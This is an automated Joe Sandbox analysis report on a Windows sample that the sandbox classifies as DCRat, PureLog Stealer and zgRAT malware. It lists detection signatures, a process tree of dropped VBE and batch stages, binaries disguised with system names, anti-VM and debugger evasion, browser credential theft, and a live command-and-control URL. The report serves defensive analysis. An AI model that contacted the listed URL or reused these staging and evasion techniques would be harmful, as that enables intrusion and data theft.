Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hT7clR9Gz2.exe

Overview

General Information

Sample name:hT7clR9Gz2.exe
renamed because original name is a hash value
Original sample name:0CADB063C76CEC669E88F104493A56F1.exe
Analysis ID:1403707
MD5:0cadb063c76cec669e88f104493a56f1
SHA1:929cf2e69d8afe9485d47a4a1c80cfe5a0ac9321
SHA256:31c9aec77607a885cf75c66cd02b721bf4a866444d58bf2eaa766ef928830cb3
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • hT7clR9Gz2.exe (PID: 6532 cmdline: C:\Users\user\Desktop\hT7clR9Gz2.exe MD5: 0CADB063C76CEC669E88F104493A56F1)
    • wscript.exe (PID: 6252 cmdline: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hyperbrokerhostNetsvc.exe (PID: 5492 cmdline: C:\PortCommon/hyperbrokerhostNetsvc.exe MD5: 6BB2A8990AE25FE86B233C31D6CB93BC)
          • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3780 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5564 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • vVSUwBXtljAfFANPiZBBPFzlgh.exe (PID: 4980 cmdline: "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe" MD5: 6BB2A8990AE25FE86B233C31D6CB93BC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 5 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 4 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\PortCommon\hyperbrokerhostNetsvc.exe, ProcessId: 5492, TargetFilename: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe
                          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\Desktop\hT7clR9Gz2.exe, ParentImage: C:\Users\user\Desktop\hT7clR9Gz2.exe, ParentProcessId: 6532, ParentProcessName: hT7clR9Gz2.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" , ProcessId: 6252, ProcessName: wscript.exe

                          Snort Signatures

                          Timestamp:03/05/24-22:27:38.801530
                          SID:2048095
                          Source Port:49712
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: http://h172956.srv11.test-hf.su/Avira URL Cloud: Label: malware
                          Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php(gIAvira URL Cloud: Label: malware
                          Source: http://h172956.srv11.test-hf.suAvira URL Cloud: Label: malware
                          Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.phpAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\user\Desktop\MjOKfqVp.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                          Source: C:\Users\user\Desktop\DjncgsWF.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                          Source: C:\Users\user\Desktop\NcaIHEGQ.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\CNmCQxgq.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\RFZqtRqa.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\PortCommon\sihost.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                          Source: C:\Users\user\Desktop\YQFyrQBy.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\Desktop\hgVgFZAw.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Multi AV Scanner detection for dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeReversingLabs: Detection: 87%
                          Source: C:\PortCommon\sihost.exeReversingLabs: Detection: 87%
                          Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeReversingLabs: Detection: 87%
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeReversingLabs: Detection: 87%
                          Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\Desktop\DjncgsWF.logReversingLabs: Detection: 62%
                          Source: C:\Users\user\Desktop\YQFyrQBy.logReversingLabs: Detection: 62%
                          Multi AV Scanner detection for submitted file
                          Source: hT7clR9Gz2.exeReversingLabs: Detection: 55%
                          Machine Learning detection for dropped file
                          Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\EgPkCslz.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\RFZqtRqa.logJoe Sandbox ML: detected
                          Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exeJoe Sandbox ML: detected
                          Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJoe Sandbox ML: detected
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeJoe Sandbox ML: detected
                          Source: C:\PortCommon\sihost.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\aSrhMzGt.logJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: hT7clR9Gz2.exeJoe Sandbox ML: detected

                          Compliance

                          barindex
                          Detected unpacking (creates a PE file in dynamic memory)
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeUnpacked PE file: 6.2.hyperbrokerhostNetsvc.exe.3080000.2.unpack
                          Source: hT7clR9Gz2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\56085415360792Jump to behavior
                          Source: hT7clR9Gz2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: wC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: zC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: hC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: oC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: fC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: xC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: }C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hT7clR9Gz2.exe
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
